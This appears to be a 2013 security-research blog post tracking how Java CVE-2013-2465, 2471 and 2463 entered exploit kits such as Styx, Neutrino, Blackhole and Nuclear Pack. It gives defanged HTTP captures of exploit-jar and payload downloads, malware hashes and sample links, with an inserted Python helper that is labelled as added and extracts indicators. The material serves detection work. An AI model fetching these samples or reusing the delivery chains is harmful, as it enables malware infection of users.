2013-08-15 - Exploit Integration

CVE-2013-2465 / CVE-2013-2471 / CVE-2013-2463 being integrated in Exploit Kits -- jre7u21, jre6u45 and earlier




Two days after disclosure, CVE-2013-2465 is starting to be integrated in Exploit Kits.
What makes it "better" than CVE-2013-2460 (recently integrated in Private Exploit Pack) is that it targets the whole Java 6 branch (update 45 included).

<edit4> NB: I have been told that it crashes with jre6 <= update 18 </edit4>

Here it is in Styx "Kein Edition":
(this is Styx, but that instance was named Kein in the past)

CVE-2013-2465 successful pass in Styx "Kein Edition"

GET http://www3.upziaixl5c0vi0.4pu .com/?26wu4g7=Vqbg2XGaXerZ3qaSmaicbomc6aZdZlzr6aCkbKbSr52am6vRZpVU
302 Moved Temporarily to http://www1.e23xiqinf9cjsdfh.4pu .com/i.html?1wsgytq9=VezYzrbn0qjWnVnt0tWmn5Zpk6OZ1M%2FMbqqZyNvW43a3hn6e1eSmn5Zpm5Di16Pfp66ZyeLYrpvEe3ixj9jc6NGboOPY3Nvcl%2BqZytyxtX6Lm6O1nKKXpZRqm6GhnJ%2BOpOvU2%2B7nrmqLqZzcpqKZnplf197foZuZk6ynoKun1mqXWKfrpqKcpZxulKKkl5aOlebgyOLirrDcqWam3uHj18ei29aox5bemqehm%2Bnpn5zUn1nr3uXZq8%2Bs2NPrztOOo9zZpOHo5amKZXSdm7eOoKysyNzqksnUmtre2ujmn5zUn1iqr%2BPO0s%2Brkdrb1Iubd%2Bzl056ntaHZpqOdnLKOoKxelbDU0M%2FJpOXY3qmkp2fXp1iqr%2BXN4YtrqdPhksnPmpymraqqlQ%3D%3D

GET http://www1.e23xiqinf9cjsdfh.4pu .com/i.html?1wsgytq9=VezYzrbn0qjWnVnt0tWmn5Zpk6OZ1M%2FMbqqZyNvW43a3hn6e1eSmn5Zpm5Di16Pfp66ZyeLYrpvEe3ixj9jc6NGboOPY3Nvcl%2BqZytyxtX6Lm6O1nKKXpZRqm6GhnJ%2BOpOvU2%2B7nrmqLqZzcpqKZnplf197foZuZk6ynoKun1mqXWKfrpqKcpZxulKKkl5aOlebgyOLirrDcqWam3uHj18ei29aox5bemqehm%2Bnpn5zUn1nr3uXZq8%2Bs2NPrztOOo9zZpOHo5amKZXSdm7eOoKysyNzqksnUmtre2ujmn5zUn1iqr%2BPO0s%2Brkdrb1Iubd%2Bzl056ntaHZpqOdnLKOoKxelbDU0M%2FJpOXY3qmkp2fXp1iqr%2BXN4YtrqdPhksnPmpymraqqlQ%3D%3D
200 OK (text/html)

GET http://www1.e23xiqinf9cjsdfh.4pu .com/zpdr.html
200 OK (text/html)

GET http://www1.e23xiqinf9cjsdfh .4pu.com/jvvn.html
200 OK (text/html)

GET http://www1.e23xiqinf9cjsdfh .4pu.com/BlUrdse.jar
200 OK (application/java-archive)  a57c6b750f4ad08816086af89fe79fc6 File: Owncloud via goo.gl

Piece of CVE-2013-2465 in Styx "Kein"


GET http://www2.d-93mv3zwkzkt.co7 .us/?qj7xbjj33e=lc2k3J%2FP4phZ2s2RdmSdpmOznd%2Fu17Gmm5mtlqOcZpiWllOtpqqnZrGtoKujpaSaXeTVp5tjY52KjpuV37OFzsKR6tTYrp1d64Y%3D&h=15
200 OK (application/octet-stream) 727aa2741cf1acfda34dd7d039950ea2 Simda
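Every capture in this post uses the same two-line notation: a request line, then a status line carrying the content type, the MD5 of what was served and a comment, with hosts defanged by a space before a dot ("4pu .com"). As an added example that is not part of the original post, here is a small Python triage helper for that notation: it refangs the URLs, pairs requests with responses, extracts hosts and hashes, and flags the drive-by pattern visible in the Styx capture above, a Java archive fetched and then an executable payload fetched afterwards, here from a different host than the jar. The sample input is constructed from the Styx lines above with the long query strings shortened; the content types in JAR_TYPES and BINARY_TYPES are the ones that appear on this page, nothing else is assumed about the kits.

```python
"""Triage helper for the request/response notes used throughout this post.

Added example, not code from the original post. Parses the two-line
"GET url" / "200 OK (content-type) md5 comment" notation, refangs the
defanged hosts, extracts IOCs and flags the jar-then-binary drive-by pattern.
"""
import re
from urllib.parse import urlparse

# Constructed from the Styx "Kein" capture above; query strings shortened.
SAMPLE = """\
GET http://www3.upziaixl5c0vi0.4pu .com/?26wu4g7=Vqbg2XGaXerZ3qaSmaicbomc6aZdZlzr6aCkbKbSr52am6vRZpVU
302 Moved Temporarily to http://www1.e23xiqinf9cjsdfh.4pu .com/i.html?1wsgytq9=VezYzrbn0qjWnVnt0tWmn5Zpk6OZ

GET http://www1.e23xiqinf9cjsdfh.4pu .com/i.html?1wsgytq9=VezYzrbn0qjWnVnt0tWmn5Zpk6OZ
200 OK (text/html)

GET http://www1.e23xiqinf9cjsdfh .4pu.com/jvvn.html
200 OK (text/html)

GET http://www1.e23xiqinf9cjsdfh .4pu.com/BlUrdse.jar
200 OK (application/java-archive)  a57c6b750f4ad08816086af89fe79fc6 File: Owncloud via goo.gl

GET http://www2.d-93mv3zwkzkt.co7 .us/?qj7xbjj33e=lc2k3J&h=15
200 OK (application/octet-stream) 727aa2741cf1acfda34dd7d039950ea2 Simda
"""

# Content types seen on this page for the exploit jar and for the dropped binary.
JAR_TYPES = {"application/java-archive", "application/x-java-archive", "application/java"}
BINARY_TYPES = {"application/octet-stream", "application/x-msdownload"}

REQUEST_RE = re.compile(r"^(GET|POST)\s+(\S.*)$")
RESPONSE_RE = re.compile(r"^(\d{3})\s+(.*)$")
CTYPE_RE = re.compile(r"\(([^)]*)\)")
MD5_RE = re.compile(r"\b[0-9a-f]{32}\b")


def refang(url):
    """Undo the 'host .tld' defanging of the notes so urlparse sees a real host."""
    return re.sub(r"\s*\.\s*", ".", url.strip())


def parse_notes(text):
    """Turn request/response line pairs into dicts; unpaired lines are ignored."""
    records, pending = [], None
    for line in text.splitlines():
        line = line.strip()
        req = REQUEST_RE.match(line)
        if req:
            url = refang(req.group(2))
            pending = {"method": req.group(1), "url": url, "host": urlparse(url).netloc,
                       "status": None, "ctype": None, "md5": None, "note": ""}
            continue
        resp = RESPONSE_RE.match(line)
        if resp and pending is not None:
            rest = resp.group(2)
            ctype_m = CTYPE_RE.search(rest)   # "(text/html)"; a 302 line has none
            md5_m = MD5_RE.search(rest)       # first 32-hex token, if the note has one
            pending["status"] = int(resp.group(1))
            pending["ctype"] = (ctype_m.group(1).strip().lower() or None) if ctype_m else None
            pending["md5"] = md5_m.group(0) if md5_m else None
            pending["note"] = rest
            records.append(pending)
            pending = None
    return records


def stage(rec):
    """Classify one request by what the server returned (URL suffix as fallback)."""
    if rec["status"] is not None and 300 <= rec["status"] < 400:
        return "redirect"
    if rec["ctype"] in JAR_TYPES or urlparse(rec["url"]).path.lower().endswith(".jar"):
        return "jar"
    if rec["ctype"] in BINARY_TYPES:
        return "binary"
    if rec["ctype"] == "text/html":
        return "html"
    return "other"


def find_chains(records):
    """Pair each exploit jar with the first binary fetched after it, whatever the host."""
    chains = []
    for i, rec in enumerate(records):
        if stage(rec) != "jar":
            continue
        payload = next((r for r in records[i + 1:] if stage(r) == "binary"), None)
        chains.append({
            "jar_host": rec["host"], "jar_md5": rec["md5"],
            "payload_host": payload["host"] if payload else None,
            "payload_md5": payload["md5"] if payload else None,
            "cross_host": bool(payload) and payload["host"] != rec["host"],
        })
    return chains


def extract_iocs(records):
    """Collect refanged hosts and MD5s for blocking or hunting."""
    return {"hosts": sorted({r["host"] for r in records if r["host"]}),
            "md5s": sorted({r["md5"] for r in records if r["md5"]})}


if __name__ == "__main__":
    recs = parse_notes(SAMPLE)
    for c in find_chains(recs):
        print("jar %s on %s -> payload %s on %s (cross-host: %s)" % (
            c["jar_md5"], c["jar_host"], c["payload_md5"], c["payload_host"], c["cross_host"]))
    print(extract_iocs(recs))
```

Captures where the payload travels inside the jar (Flimkit, and Cool EK from 2013-08-27 below) yield a chain with payload_host None, which is itself worth noticing: a Java archive with no follow-up binary download and a later callback. Hash matching only catches the exact samples listed here; the fast-rotating Blackhole "EKaaS" domains show why the structural jar-then-binary check is the part that survives.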


I will update this post as soon as I find it elsewhere.

<edit1 2013-08-16 18:00>
"When it rains, it pours", Timo Hirvonen about the CVE-2013-2471 PoC published on 2013-08-14.

Timo Hirvonen (F-Secure) tweet about the CVE-2013-2471 PoC
Two days after publication, the code reached an exploit kit too.
CVE-2013-2471 spotted in Kore Exploit Kit:
(aka Sibhost, aka Urausy/BestAV EK)

Many thanks to Timo Hirvonen and Chris Wakelin for help.

CVE-2013-2471 Successful pass in Kore 2013-08-16
GET http://21sdtdzdrbzdrb8.3d-game .com:85/6N3M5P9z2L0KiXxnm5V9HonGcL7VP
200 OK (text/html)

GET http://21sdtdzdrbzdrb8.3d-game .com:85/jquery.js
200 OK (application/javascript)

GET http://21sdtdzdrbzdrb8.3d-game .com:85/6N3M5P9z2L0KiXxnm5V9HonGcL7VP1.zip
200 OK (application/octet-stream)  f32de44a0886a75af7aa5285a66707de File : http://goo.gl/UQ7mhq


CVE-2013-2471 in Kore


GET http://21sdtdzdrbzdrb8.3d-game .com/6N3M5P9z2L0KiXxnm5V9HonGcL7VP?id=1&text=620
200 OK (text/html) <-- Callback after successful infection

Payload is Urausy.
</edit1>
<edit2 2013-08-17>
CVE-2013-2465 spotted in Redkit x2o :

<edit3>This is NOT Redkit. Sorry about that. Thanks @xio_security. </edit3>
<edit7> We'll refer to this exploit kit as x2o (based on the text we can find now in the landing), as long as we do not know its official name. This really looks like a "Redkit Light" (as @EKWatcher wrote) </edit7>


CVE-2013-2465 successful pass in Redkit x2o
GET http://heimstaette-baerau .ch/blog/?p=5643
200 OK (text/html)

GET http://heimstaette-baerau .ch/blog/zps.fe54
200 OK (text/html)

GET http://heimstaette-baerau .ch/blog/rebza.tmp
200 OK (application/java-archive) 0996091c7bca0375cef3fb85bbc39af4 File here (Owncloud via goo.gl)

Piece of CVE-2013-2465 in Redkit jar 2013-08-17


GET http://heimstaette-baerau .ch/download.asp?p=1
200 OK (application/octet-stream) Karagny (??) -  Decoded : ea40fee41c877f33b48125dbe92151bf

Sakura : CVE-2013-2471 :
Thanks to Chris Wakelin for providing a referer.


CVE-2013-2465 successful pass in Sakura 2013-08-17
GET http://28holo.iyupinaiqu.slupsk .pl:52/round.php
200 OK (text/html)


GET http://28holo.iyupinaiqu.slupsk .pl:52/groundmembers.b
200 OK ()  21b414d722e79f0af3fb8b1ec3a10d26 File here (Owncloud via goo.gl)

CVE-2013-2471 in Sakura 2013-08-17
GET http://28holo.iyupinaiqu.slupsk .pl:52/25747.a
200 OK (application/octet-stream) Zaccess. Decoded : 64fca5d4cc118384a1dd4d12d1028914


</edit2>
<edit4 2013-08-18>
Neutrino : CVE-2013-2465 :
In Neutrino now (CVE-2013-2465, not 2471 as previously written; thanks Chris Wakelin).
CVE-2013-2465 successful pass in Neutrino 2013-08-18 =)
GET http://bcmgmychnitfsyrfhysjj.podzone .org:8000/hhmblrbxccy?grxxbc=1492014
200 OK (text/html)

GET http://ajax.googleapis .com/ajax/libs/jquery/1.9.1/jquery.min.js
200 OK (text/javascript)

GET http://bcmgmychnitfsyrfhysjj.podzone .org:8000/index.js
200 OK (application/x-javascript)

POST http://bcmgmychnitfsyrfhysjj.podzone .org:8000/nbmucsyxv
200 OK (text/html)

GET http://bcmgmychnitfsyrfhysjj.podzone .org:8000/exrybkyrvdjes?yegpmkpd=noksqa
200 OK (application/java-archive) 46e2cc42dba10e6de72fbdacc5bf1b9d File Here (Owncloud via goo.gl)

Piece of CVE-2013-2465 in Neutrino jar 2013-08-18


GET http://bcmgmychnitfsyrfhysjj.podzone .org:8000/zdalnfookkkic?yjnhbik=noksqa
200 OK (application/octet-stream)  Payload once decoded was : 5d6d892cdc7d580839d0947fa983775c
</edit4>
<edit6 2013-08-20>
Blackhole Exploit Kit : CVE-2013-2465
CVE-2013-2465 positive pass in Blackhole Exploit Kit 2013-08-20

Note: this is a Blackhole instance run as "EKaaS" (exploit kit as a service) through its API (domain and path rotate fast).

GET http://mlbrsd.xx2.peoplesearcherstuners .org/2c6f1/components_cums_affecting/persuade_chips-install.php
200 OK (text/html)


GET http://mlbrsd.xx2.peoplesearcherstuners .org/2c6f1/components_cums_affecting/persuade_chips-install.php?gktBn=atztcBRX&yBeNSyNyLEgI=rIiTF
200 OK (application/java-archive)  
6cf6091c11a9fdf2fe23afcfd39010e8 File here

Piece of CVE-2013-2465 code in BH EK & Cool EK 2013-08-20

GET http://isuvnw.xx2.peoplesearcherstuners .org/2c6f1/components_cums_affecting/persuade_chips-install.php?sf=52322h2f32&be=532f553155532j552g32&y=2d&eZ=V&RR=L
200 OK (application/x-msdownload) Payload once Decoded : fc4fb9bedb0c3f57d4eb824308ea15ab

Note: the author announces CVE-2013-2471 :)



Cool EK : CVE-2013-2465 (exact same file as Blackhole)


GET http://degnera.realdealdemocracy .com:801/hard_piece-core_sulphur.php
200 OK (text/html)

GET http://degnera.realdealdemocracy .com:801/send_civic.html
200 OK (text/html)

GET http://degnera.realdealdemocracy .com:801/quietly-sort-withdrawal_unity.html
200 OK (text/html)

GET http://degnera.realdealdemocracy .com:801/tame_knight-courage.html
200 OK (text/html)

GET http://degnera.realdealdemocracy .com:801/determine-syntactic_winner.html
200 OK (text/html)

GET http://degnera.realdealdemocracy .com:801/diagnosis_hemisphere_energy.jar
200 OK (application/java-archive) 6cf6091c11a9fdf2fe23afcfd39010e8 File here

Piece of CVE-2013-2465 code in BH EK & Cool EK 2013-08-20
GET http://degnera.realdealdemocracy .com:801/diagnosis_hemisphere_energy.txt?e=20
200 OK (application/x-msdownload) c973b3c58ec3bb04a43e649722e1e2f1 (didn't check, but it should be Reveton/Live Security Professional)
</edit6>
<edit7 2013-08-21>
Flimkit : CVE-2013-2471:

CVE-2013-2471 successful pass in Flimkit 2013-08-21
The 404 is the callback for stats after successful infection.
GET http://sezipahomez .net/tzsufxoh
200 OK (text/html)  <-- landing is built upon ripped antivirus company pages (Avast, Symantec, etc.)


Piece of Landing source code
(based on code duplicated from multiple antivirus vendors' websites)


GET http://sezipahomez .net/ewreucbfvzzegaavotaw.jar
200 OK (application/java-archive) 99e5dcf1fcb880fa86e967826549e625 Files here (Owncloud via goo.gl)

CVE-2013-2471 in Flimkit (Payload in the jar)
Decoded payload from the jar : 480848172062f4e63909b43aab5013be

GET http://sezipahomez .net/vdvsvtzxorybrzbwpck
404 Not Found (text/html)  (callback on successful infection, for statistics purposes)
</edit7>
<edit8 2013-08-24>
Glazunov : CVE-2013-2471
It seems an attempt to integrate this CVE was already there 4 days ago ( 882efabd68fc28919ca5704d30f1de92 ) but with no infection.
I did not spend time understanding why. It seems it was "fixed" 2 days ago.
CVE-2013-2471 positive pass in Glazunov 2013-08-24
GET http://212.124.115.231-static.reverse.softlayer .com:8080/2634432140/589
200 OK (application/javascript)

GET http://212.124.115.231-static.reverse.softlayer .com:8080/2634432140/8.zip
200 OK (application/x-java-archive)

GET http://212.124.115.231-static.reverse.softlayer .com:8080/2634432140/8.zip
200 OK (application/x-java-archive) 48bc7092e96ea572a2ca4cc683b48fc3 Files (win and fail(?) ) here


Piece of CVE-2013-2471 in Glazunov 2013-08-24


GET http://212.124.115.231-static.reverse.softlayer .com:8080/27841
200 OK (application/octet-stream) Payload : a89a6db9c9487453466cafa9613c743a Zaccess
</edit8>
<edit9 2013-08-26>

Timo Hirvonen from F-Secure spotted the CVE-2013-2463 in the last Neutrino jar pushed for jre6u45.

Neutrino switched from CVE-2013-2465 to CVE-2013-2463 :
23e162d59f83a0b2fc1048ddd99720a4  Sample here.
1edb56eb2b79965240752a34f52530bb 2013-08-27
Piece of CVE-2013-2463 in Neutrino Jar  - 2013-08-26
(thx Timo for the Hints)
2013-08-27 Neutrino switched back to CVE-2013-2465; the reason, I would say, is that CVE-2013-2463 was not working for them (in fact, no infection with it in the past 2 days).
</edit9>
<edit14 2013-09-06> It seems today CVE-2013-2463 is back in Neutrino and is working properly.
Waiting for confirmations before publishing </edit14>

<edit10 2013-08-27>
Cool EK switched to CVE-2013-2471, with the payload in the jar, using the Kore EK jar:
CVE-2013-2471 with Payload in the jar too in Cool EK 2013-08-27

GET http://iefn-sydneyiteticklybenders.shortnorthrunningclub .com:972/fair_pollution-yacht_character.html
200 OK (text/html)

GET http://iefn-sydneyiteticklybenders.shortnorthrunningclub .com:972/second_wall.js
200 OK (text/javascript)

GET http://iefn-sydneyiteticklybenders.shortnorthrunningclub .com:972/client_restore-maximum_nurse.jar
200 OK (application/java-archive)  a480ad85251536c5c1382f1eea55e1a9 



GET http://iefn-sydneyiteticklybenders.shortnorthrunningclub .com:972/wherever_orange.txt?e=21
200 OK (application/x-msdownload) Reveton 6b712002ab0aaf54f1a9602d9158054c
</edit10>
<edit11 : 2013-08-30>
Gong Da : CVE-2013-2465 :
Chinese Exploit Pack Updated - KahuSecurity - 2013-08-29
</edit11>
<edit12 2013-09-04>
Nuclear Pack : CVE-2013-2471


CVE-2013-2471 successful pass in Nuclear Pack vs Win7 x64 jre16u45
+ Payload (TitanAntivirus) activity


GET http://eixxs1sd.shetbetpeoch .biz:29991/c4700fff73601cb826054e2c10d5ca26.html
200 OK (text/html)


GET http://eixxs1sd.shetbetpeoch .biz:29991/3c3846e79f3b02ffae9a7236558ee437/1378324484/c3a3594767f485702008396f568d36e6.jar
200 OK (application/java) 
570b794f3ea75e25a29c12140bccdee1

Piece of CVE-2013-2471 code in Nuclear Pack jar
GET http://eixxs1sd.shetbetpeoch .biz:29991/3c3846e79f3b02ffae9a7236558ee437/1378324484/c3a3594767f485702008396f568d36e6.jar
200 OK (application/java) 

GET http://eixxs1sd.shetbetpeoch .biz:29991/f/1378324484/c3a3594767f485702008396f568d36e6/3c3846e79f3b02ffae9a7236558ee437/2
200 OK (application/octet-stream)  1684947fed73c0e3c2264a990b0ae88a (off topic: Titan Antivirus 2013 fake AV)


GET http://eixxs1sd.shetbetpeoch .biz:29991/f/1378324484/c3a3594767f485702008396f568d36e6/3c3846e79f3b02ffae9a7236558ee437/2/2
200 OK (application/octet-stream)


Jar and samples here.

</edit12>
<edit13 2013-09-09>
GrandSoft : CVE-2013-2463
Read:  Finally, here is.... GrandSoft - 2013-09-09
</edit13>
<edit14>
Exploit kits vs jre17u21 2013-09-15 : http://pastebin.com/raw.php?i=G97kiNPv
Infection via click2play and CVE-2013-2471 for Sweet Orange, Glazunov and KoreIsh Cool EK
Quite surely Kore too.
</edit14>


Read more :
CVE-2013-2465 Full disclosure - 2013-08-12 - Seclists.org
CVE-2013-2471 Full disclosure - 2013-08-14 - Seclists.org
CVE-2013-2463 Full disclosure - 2013-08-19 - Seclists.org